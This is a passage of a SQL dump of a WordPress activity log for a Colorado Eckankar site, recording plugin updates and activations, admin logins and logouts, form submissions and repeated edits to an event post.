LLC</a>.</cite>'),(242079,41111,'plugin_author','<a href=\"https://fluentforms.com\">Contact Form - WPManageNinja LLC</a>'),(242080,41111,'plugin_version','5.1.2'),(242081,41111,'plugin_url','https://wpmanageninja.com/wp-fluent-form/'),(242082,41111,'plugin_prev_version','5.1.1'),(242083,41111,'_message_key','plugin_bulk_updated'),(242084,41111,'_user_id','2'),(242085,41111,'_user_login','S8zhaBda'),(242086,41111,'_user_email','nada@zipnadanot.org'),(242087,41111,'_server_remote_addr','76.130.120.x'),(242088,41111,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242089,41112,'plugin_slug','modern-events-calendar'),(242090,41112,'plugin_name','Modern Events Calendar'),(242091,41112,'plugin_title','<a href=\"http://webnus.net/modern-events-calendar/\">Modern Events Calendar</a>'),(242092,41112,'plugin_description','An awesome plugin for events calendar <cite>By <a href=\"https://webnus.net\">Webnus</a>.</cite>'),(242093,41112,'plugin_author','<a href=\"https://webnus.net\">Webnus</a>'),(242094,41112,'plugin_version','7.3.0'),(242095,41112,'plugin_url','http://webnus.net/modern-events-calendar/'),(242096,41112,'plugin_prev_version','7.2.2'),(242097,41112,'_message_key','plugin_bulk_updated'),(242098,41112,'_user_id','2'),(242099,41112,'_user_login','S8zhaBda'),(242100,41112,'_user_email','nada@zipnadanot.org'),(242101,41112,'_server_remote_addr','76.130.120.x'),(242102,41112,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242103,41113,'plugin_slug','responsive-accordion-and-collapse'),(242104,41113,'plugin_name','Responsive Accordion And Collapse'),(242105,41113,'plugin_title','<a href=\"https://www.wpshopmart.com/plugins/\">Responsive Accordion And Collapse</a>'),(242106,41113,'plugin_description','Responsive Accordion is the most easiest drag &amp; drop accordion builder for WordPress. You can generate multiple accordion and collapse with multiple colour. <cite>By <a href=\"https://www.wpshopmart.com\">wpshopmart</a>.</cite>'),(242107,41113,'plugin_author','<a href=\"https://www.wpshopmart.com\">wpshopmart</a>'),(242108,41113,'plugin_version','2.4.6'),(242109,41113,'plugin_url','https://www.wpshopmart.com/plugins/'),(242110,41113,'plugin_prev_version','2.4.5'),(242111,41113,'_message_key','plugin_bulk_updated'),(242112,41113,'_user_id','2'),(242113,41113,'_user_login','S8zhaBda'),(242114,41113,'_user_email','nada@zipnadanot.org'),(242115,41113,'_server_remote_addr','76.130.120.x'),(242116,41113,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242117,41114,'plugin_slug','wp-fastest-cache'),(242118,41114,'plugin_name','WP Fastest Cache'),(242119,41114,'plugin_title','<a href=\"http://wordpress.org/plugins/wp-fastest-cache/\">WP Fastest Cache</a>'),(242120,41114,'plugin_description','The simplest and fastest WP Cache system <cite>By <a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>.</cite>'),(242121,41114,'plugin_author','<a href=\"https://www.wpfastestcache.com/\">Emre Vona</a>'),(242122,41114,'plugin_version','1.2.2'),(242123,41114,'plugin_url','http://wordpress.org/plugins/wp-fastest-cache/'),(242124,41114,'plugin_prev_version','1.2.1'),(242125,41114,'_message_key','plugin_bulk_updated'),(242126,41114,'_user_id','2'),(242127,41114,'_user_login','S8zhaBda'),(242128,41114,'_user_email','nada@zipnadanot.org'),(242129,41114,'_server_remote_addr','76.130.120.x'),(242130,41114,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242131,41115,'plugin_slug','wp-staging'),(242132,41115,'plugin_name','WP STAGING - Backup Duplicator &amp; Migration'),(242133,41115,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">WP STAGING - Backup Duplicator &amp; Migration</a>'),(242134,41115,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(242135,41115,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(242136,41115,'plugin_version','3.1.2'),(242137,41115,'plugin_url','https://wordpress.org/plugins/wp-staging'),(242138,41115,'plugin_prev_version','3.1.1'),(242139,41115,'_message_key','plugin_bulk_updated'),(242140,41115,'_user_id','2'),(242141,41115,'_user_login','S8zhaBda'),(242142,41115,'_user_email','nada@zipnadanot.org'),(242143,41115,'_server_remote_addr','76.130.120.x'),(242144,41115,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242145,41116,'plugin_name','Passster'),(242146,41116,'plugin_slug','content-protector'),(242147,41116,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242148,41116,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242149,41116,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242150,41116,'plugin_version','4.2.6'),(242151,41116,'plugin_url','https://patrickposner.dev'),(242152,41116,'_message_key','plugin_activated'),(242153,41116,'_user_id','2'),(242154,41116,'_user_login','S8zhaBda'),(242155,41116,'_user_email','nada@zipnadanot.org'),(242156,41116,'_server_remote_addr','76.130.120.x'),(242157,41116,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242158,41117,'plugin_name','Passster'),(242159,41117,'plugin_slug','content-protector'),(242160,41117,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242161,41117,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242162,41117,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242163,41117,'plugin_version','4.2.6'),(242164,41117,'plugin_url','https://patrickposner.dev'),(242165,41117,'_message_key','plugin_deactivated'),(242166,41117,'_user_id','2'),(242167,41117,'_user_login','S8zhaBda'),(242168,41117,'_user_email','nada@zipnadanot.org'),(242169,41117,'_server_remote_addr','76.130.120.x'),(242170,41117,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242171,41118,'plugin_name','Passster'),(242172,41118,'plugin_slug','content-protector'),(242173,41118,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242174,41118,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242175,41118,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242176,41118,'plugin_version','4.2.6'),(242177,41118,'plugin_url','https://patrickposner.dev'),(242178,41118,'_message_key','plugin_activated'),(242179,41118,'_user_id','2'),(242180,41118,'_user_login','S8zhaBda'),(242181,41118,'_user_email','nada@zipnadanot.org'),(242182,41118,'_server_remote_addr','76.130.120.x'),(242183,41118,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242184,41119,'plugin_name','Passster'),(242185,41119,'plugin_slug','content-protector'),(242186,41119,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242187,41119,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242188,41119,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242189,41119,'plugin_version','4.2.6'),(242190,41119,'plugin_url','https://patrickposner.dev'),(242191,41119,'_message_key','plugin_deactivated'),(242192,41119,'_user_id','2'),(242193,41119,'_user_login','S8zhaBda'),(242194,41119,'_user_email','nada@zipnadanot.org'),(242195,41119,'_server_remote_addr','76.130.120.x'),(242196,41119,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242197,41120,'plugin_name','Plugin Notes Plus'),(242198,41120,'plugin_slug','plugin-notes-plus'),(242199,41120,'plugin_title','<a href=\"https://jamiebergen.com/plugin-notes-plus/\">Plugin Notes Plus</a>'),(242200,41120,'plugin_description','Adds a column for plugin notes. <cite>By <a href=\"https://jamiebergen.com/\">Jamie Bergen</a>.</cite>'),(242201,41120,'plugin_author','<a href=\"https://jamiebergen.com/\">Jamie Bergen</a>'),(242202,41120,'plugin_version','1.2.6'),(242203,41120,'plugin_url','https://jamiebergen.com/plugin-notes-plus/'),(242204,41120,'_message_key','plugin_deactivated'),(242205,41120,'_user_id','2'),(242206,41120,'_user_login','S8zhaBda'),(242207,41120,'_user_email','nada@zipnadanot.org'),(242208,41120,'_server_remote_addr','76.130.120.x'),(242209,41120,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242210,41121,'plugin_name','Plugin Notes Plus'),(242211,41121,'plugin_slug','plugin-notes-plus'),(242212,41121,'plugin_title','<a href=\"https://jamiebergen.com/plugin-notes-plus/\">Plugin Notes Plus</a>'),(242213,41121,'plugin_description','Adds a column for plugin notes. <cite>By <a href=\"https://jamiebergen.com/\">Jamie Bergen</a>.</cite>'),(242214,41121,'plugin_author','<a href=\"https://jamiebergen.com/\">Jamie Bergen</a>'),(242215,41121,'plugin_version','1.2.6'),(242216,41121,'plugin_url','https://jamiebergen.com/plugin-notes-plus/'),(242217,41121,'_message_key','plugin_activated'),(242218,41121,'_user_id','2'),(242219,41121,'_user_login','S8zhaBda'),(242220,41121,'_user_email','nada@zipnadanot.org'),(242221,41121,'_server_remote_addr','76.130.120.x'),(242222,41121,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242223,41122,'_user_id','2'),(242224,41122,'_user_login','S8zhaBda'),(242225,41122,'_user_email','nada@zipnadanot.org'),(242226,41122,'_message_key','user_logged_out'),(242227,41122,'_server_remote_addr','76.130.120.x'),(242228,41122,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242229,41123,'post_id','269384'),(242230,41123,'post_type','nf_sub'),(242231,41123,'post_title',''),(242232,41123,'_message_key','post_updated'),(242233,41123,'_server_remote_addr','71.218.70.x'),(242234,41123,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(242235,41124,'post_id','269385'),(242236,41124,'post_type','nf_sub'),(242237,41124,'post_title',''),(242238,41124,'_message_key','post_updated'),(242239,41124,'_server_remote_addr','71.196.207.x'),(242240,41124,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_November_2023_News&utm_medium=email'),(242241,41125,'user_id','2'),(242242,41125,'user_email','nada@zipnadanot.org'),(242243,41125,'user_login','S8zhaBda'),(242244,41125,'_user_id','2'),(242245,41125,'_user_login','S8zhaBda'),(242246,41125,'_user_email','nada@zipnadanot.org'),(242247,41125,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(242248,41125,'_message_key','user_logged_in'),(242249,41125,'_server_remote_addr','76.130.120.x'),(242250,41125,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242251,41126,'user_id','2'),(242252,41126,'user_email','nada@zipnadanot.org'),(242253,41126,'user_login','S8zhaBda'),(242254,41126,'_user_id','2'),(242255,41126,'_user_login','S8zhaBda'),(242256,41126,'_user_email','nada@zipnadanot.org'),(242257,41126,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),(242258,41126,'_message_key','user_logged_in'),(242259,41126,'_server_remote_addr','76.130.120.x'),(242260,41126,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?interim-login=1&wp_lang=en_US'),(242261,41127,'plugin_name','Passster'),(242262,41127,'plugin_slug','content-protector'),(242263,41127,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242264,41127,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242265,41127,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242266,41127,'plugin_version','4.2.6'),(242267,41127,'plugin_url','https://patrickposner.dev'),(242268,41127,'_message_key','plugin_activated'),(242269,41127,'_user_id','2'),(242270,41127,'_user_login','S8zhaBda'),(242271,41127,'_user_email','nada@zipnadanot.org'),(242272,41127,'_server_remote_addr','76.130.120.x'),(242273,41127,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(242274,41128,'plugin_name','Passster'),(242275,41128,'plugin_slug','content-protector'),(242276,41128,'plugin_title','<a href=\"https://patrickposner.dev\">Passster</a>'),(242277,41128,'plugin_description','A simple plugin to password-protect your complete website, some pages/posts or just parts of your content. <cite>By <a href=\"https://patrickposner.dev\">Patrick Posner</a>.</cite>'),(242278,41128,'plugin_author','<a href=\"https://patrickposner.dev\">Patrick Posner</a>'),(242279,41128,'plugin_version','4.2.6'),(242280,41128,'plugin_url','https://patrickposner.dev'),(242281,41128,'_message_key','plugin_deactivated'),(242282,41128,'_user_id','2'),(242283,41128,'_user_login','S8zhaBda'),(242284,41128,'_user_email','nada@zipnadanot.org'),(242285,41128,'_server_remote_addr','76.130.120.x'),(242286,41128,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242287,41129,'_user_id','2'),(242288,41129,'_user_login','S8zhaBda'),(242289,41129,'_user_email','nada@zipnadanot.org'),(242290,41129,'_message_key','user_logged_out'),(242291,41129,'_server_remote_addr','76.130.120.x'),(242292,41129,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(242293,41130,'user_id','2'),(242294,41130,'user_email','nada@zipnadanot.org'),(242295,41130,'user_login','S8zhaBda'),(242296,41130,'_user_id','2'),(242297,41130,'_user_login','S8zhaBda'),(242298,41130,'_user_email','nada@zipnadanot.org'),(242299,41130,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242300,41130,'_message_key','user_logged_in'),(242301,41130,'_server_remote_addr','76.130.120.x'),(242302,41130,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242303,41131,'user_id','2'),(242304,41131,'user_email','nada@zipnadanot.org'),(242305,41131,'user_login','S8zhaBda'),(242306,41131,'_user_id','2'),(242307,41131,'_user_login','S8zhaBda'),(242308,41131,'_user_email','nada@zipnadanot.org'),(242309,41131,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242310,41131,'_message_key','user_logged_in'),(242311,41131,'_server_remote_addr','76.130.120.x'),(242312,41131,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2Fplugins.php&reauth=1'),(242313,41132,'_user_id','2'),(242314,41132,'_user_login','S8zhaBda'),(242315,41132,'_user_email','nada@zipnadanot.org'),(242316,41132,'_message_key','user_logged_out'),(242317,41132,'_server_remote_addr','76.130.120.x'),(242318,41132,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(242319,41133,'user_id','2'),(242320,41133,'user_email','nada@zipnadanot.org'),(242321,41133,'user_login','S8zhaBda'),(242322,41133,'_user_id','2'),(242323,41133,'_user_login','S8zhaBda'),(242324,41133,'_user_email','nada@zipnadanot.org'),(242325,41133,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0'),(242326,41133,'_message_key','user_logged_in'),(242327,41133,'_server_remote_addr','76.130.120.x'),(242328,41133,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?loggedout=true&wp_lang=en_US'),(242329,41134,'_user_id','2'),(242330,41134,'_user_login','S8zhaBda'),(242331,41134,'_user_email','nada@zipnadanot.org'),(242332,41134,'_message_key','user_logged_out'),(242333,41134,'_server_remote_addr','76.130.120.x'),(242334,41134,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(242335,41135,'user_id','2'),(242336,41135,'user_email','nada@zipnadanot.org'),(242337,41135,'user_login','S8zhaBda'),(242338,41135,'_user_id','2'),(242339,41135,'_user_login','S8zhaBda'),(242340,41135,'_user_email','nada@zipnadanot.org'),(242341,41135,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242342,41135,'_message_key','user_logged_in'),(242343,41135,'_server_remote_addr','76.130.120.x'),(242344,41135,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242345,41136,'_user_id','2'),(242346,41136,'_user_login','S8zhaBda'),(242347,41136,'_user_email','nada@zipnadanot.org'),(242348,41136,'_message_key','user_logged_out'),(242349,41136,'_server_remote_addr','76.130.120.x'),(242350,41136,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(242351,41137,'plugin_name','Advanced Google reCAPTCHA'),(242352,41137,'plugin_current_version','1.12'),(242353,41137,'plugin_new_version','1.13'),(242354,41137,'_message_key','plugin_update_available'),(242355,41137,'_server_remote_addr','173.231.231.x'),(242356,41138,'plugin_name','Redis Object Cache'),(242357,41138,'plugin_current_version','2.4.4'),(242358,41138,'plugin_new_version','2.5.0'),(242359,41138,'_message_key','plugin_update_available'),(242360,41138,'_server_remote_addr','173.231.231.x'),(242361,41139,'user_id','2'),(242362,41139,'user_email','nada@zipnadanot.org'),(242363,41139,'user_login','S8zhaBda'),(242364,41139,'_user_id','2'),(242365,41139,'_user_login','S8zhaBda'),(242366,41139,'_user_email','nada@zipnadanot.org'),(242367,41139,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242368,41139,'_message_key','user_logged_in'),(242369,41139,'_server_remote_addr','76.130.120.x'),(242370,41139,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(242371,41140,'post_id','269387'),(242372,41140,'post_type','mec-events'),(242373,41140,'post_title','The Power of Grace'),(242374,41140,'_message_key','post_updated'),(242375,41140,'_user_id','2'),(242376,41140,'_user_login','S8zhaBda'),(242377,41140,'_user_email','nada@zipnadanot.org'),(242378,41140,'_server_remote_addr','76.130.120.x'),(242379,41140,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=the+power+of+grace&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=f2e1580852&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F17%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F17%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(242380,41141,'new_post_title','The Power of Grace'),(242381,41141,'new_post_id','269387'),(242382,41141,'duplicated_post_title','The Power of Grace'),(242383,41141,'duplicated_post_id','268958'),(242384,41141,'_message_key','post_duplicated'),(242385,41141,'_user_id','2'),(242386,41141,'_user_login','S8zhaBda'),(242387,41141,'_user_email','nada@zipnadanot.org'),(242388,41141,'_server_remote_addr','76.130.120.x'),(242389,41141,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=the+power+of+grace&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=f2e1580852&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F17%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F17%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(242390,41142,'post_id','269387'),(242391,41142,'post_type','mec-events'),(242392,41142,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242393,41142,'post_new_thumb_id','268961'),(242394,41142,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242395,41142,'post_meta_added','78'),(242396,41142,'_message_key','post_updated'),(242397,41142,'_user_id','2'),(242398,41142,'_user_login','S8zhaBda'),(242399,41142,'_user_email','nada@zipnadanot.org'),(242400,41142,'_server_remote_addr','76.130.120.x'),(242401,41142,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242402,41143,'post_id','269387'),(242403,41143,'post_type','mec-events'),(242404,41143,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242405,41143,'post_new_thumb_id','268961'),(242406,41143,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242407,41143,'post_meta_added','78'),(242408,41143,'_message_key','post_updated'),(242409,41143,'_user_id','2'),(242410,41143,'_user_login','S8zhaBda'),(242411,41143,'_user_email','nada@zipnadanot.org'),(242412,41143,'_server_remote_addr','76.130.120.x'),(242413,41143,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242414,41144,'post_id','269387'),(242415,41144,'post_type','mec-events'),(242416,41144,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242417,41144,'post_new_thumb_id','268961'),(242418,41144,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242419,41144,'post_meta_added','78'),(242420,41144,'_message_key','post_updated'),(242421,41144,'_user_id','2'),(242422,41144,'_user_login','S8zhaBda'),(242423,41144,'_user_email','nada@zipnadanot.org'),(242424,41144,'_server_remote_addr','76.130.120.x'),(242425,41144,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242426,41145,'post_id','269387'),(242427,41145,'post_type','mec-events'),(242428,41145,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242429,41145,'post_new_thumb_id','268961'),(242430,41145,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242431,41145,'post_meta_added','78'),(242432,41145,'_message_key','post_updated'),(242433,41145,'_user_id','2'),(242434,41145,'_user_login','S8zhaBda'),(242435,41145,'_user_email','nada@zipnadanot.org'),(242436,41145,'_server_remote_addr','76.130.120.x'),(242437,41145,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242438,41146,'post_id','269387'),(242439,41146,'post_type','mec-events'),(242440,41146,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242441,41146,'post_new_thumb_id','268961'),(242442,41146,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242443,41146,'post_meta_added','78'),(242444,41146,'_message_key','post_updated'),(242445,41146,'_user_id','2'),(242446,41146,'_user_login','S8zhaBda'),(242447,41146,'_user_email','nada@zipnadanot.org'),(242448,41146,'_server_remote_addr','76.130.120.x'),(242449,41146,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242450,41147,'post_id','269387'),(242451,41147,'post_type','mec-events'),(242452,41147,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242453,41147,'post_new_thumb_id','268961'),(242454,41147,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242455,41147,'post_meta_added','78'),(242456,41147,'_message_key','post_updated'),(242457,41147,'_user_id','2'),(242458,41147,'_user_login','S8zhaBda'),(242459,41147,'_user_email','nada@zipnadanot.org'),(242460,41147,'_server_remote_addr','76.130.120.x'),(242461,41147,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242462,41148,'post_id','269387'),(242463,41148,'post_type','mec-events'),(242464,41148,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242465,41148,'post_new_thumb_id','268961'),(242466,41148,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242467,41148,'post_meta_added','78'),(242468,41148,'_message_key','post_updated'),(242469,41148,'_user_id','2'),(242470,41148,'_user_login','S8zhaBda'),(242471,41148,'_user_email','nada@zipnadanot.org'),(242472,41148,'_server_remote_addr','76.130.120.x'),(242473,41148,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242474,41149,'post_id','269387'),(242475,41149,'post_type','mec-events'),(242476,41149,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242477,41149,'post_new_thumb_id','268961'),(242478,41149,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242479,41149,'post_meta_added','78'),(242480,41149,'_message_key','post_updated'),(242481,41149,'_user_id','2'),(242482,41149,'_user_login','S8zhaBda'),(242483,41149,'_user_email','nada@zipnadanot.org'),(242484,41149,'_server_remote_addr','76.130.120.x'),(242485,41149,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242486,41150,'post_id','269387'),(242487,41150,'post_type','mec-events'),(242488,41150,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242489,41150,'post_new_thumb_id','268961'),(242490,41150,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242491,41150,'post_meta_added','78'),(242492,41150,'_message_key','post_updated'),(242493,41150,'_user_id','2'),(242494,41150,'_user_login','S8zhaBda'),(242495,41150,'_user_email','nada@zipnadanot.org'),(242496,41150,'_server_remote_addr','76.130.120.x'),(242497,41150,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242498,41151,'post_id','269387'),(242499,41151,'post_type','mec-events'),(242500,41151,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242501,41151,'post_new_thumb_id','268961'),(242502,41151,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242503,41151,'post_meta_added','78'),(242504,41151,'_message_key','post_updated'),(242505,41151,'_user_id','2'),(242506,41151,'_user_login','S8zhaBda'),(242507,41151,'_user_email','nada@zipnadanot.org'),(242508,41151,'_server_remote_addr','76.130.120.x'),(242509,41151,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242510,41152,'post_id','269387'),(242511,41152,'post_type','mec-events'),(242512,41152,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242513,41152,'post_new_thumb_id','268961'),(242514,41152,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242515,41152,'post_meta_added','78'),(242516,41152,'_message_key','post_updated'),(242517,41152,'_user_id','2'),(242518,41152,'_user_login','S8zhaBda'),(242519,41152,'_user_email','nada@zipnadanot.org'),(242520,41152,'_server_remote_addr','76.130.120.x'),(242521,41152,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242522,41153,'post_id','269387'),(242523,41153,'post_type','mec-events'),(242524,41153,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242525,41153,'post_new_thumb_id','268961'),(242526,41153,'post_new_thumb_title','2023-ESC-Oct-Seminar-web2'),(242527,41153,'post_meta_added','78'),(242528,41153,'_message_key','post_updated'),(242529,41153,'_user_id','2'),(242530,41153,'_user_login','S8zhaBda'),(242531,41153,'_user_email','nada@zipnadanot.org'),(242532,41153,'_server_remote_addr','76.130.120.x'),(242533,41153,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269387'),(242534,41154,'post_type','attachment'),(242535,41154,'attachment_id','269388'),(242536,41154,'attachment_title','power-of-grace-streaming-1'),(242537,41154,'attachment_filename','power-of-grace-streaming-1.jpg'),(242538,41154,'attachment_mime','image/jpeg'),(242539,41154,'attachment_filesize','78665'),(242540,41154,'attachment_parent_id','269387'),(242541,41154,'attachment_parent_title','The Power of Grace: A Secret to Spiritual 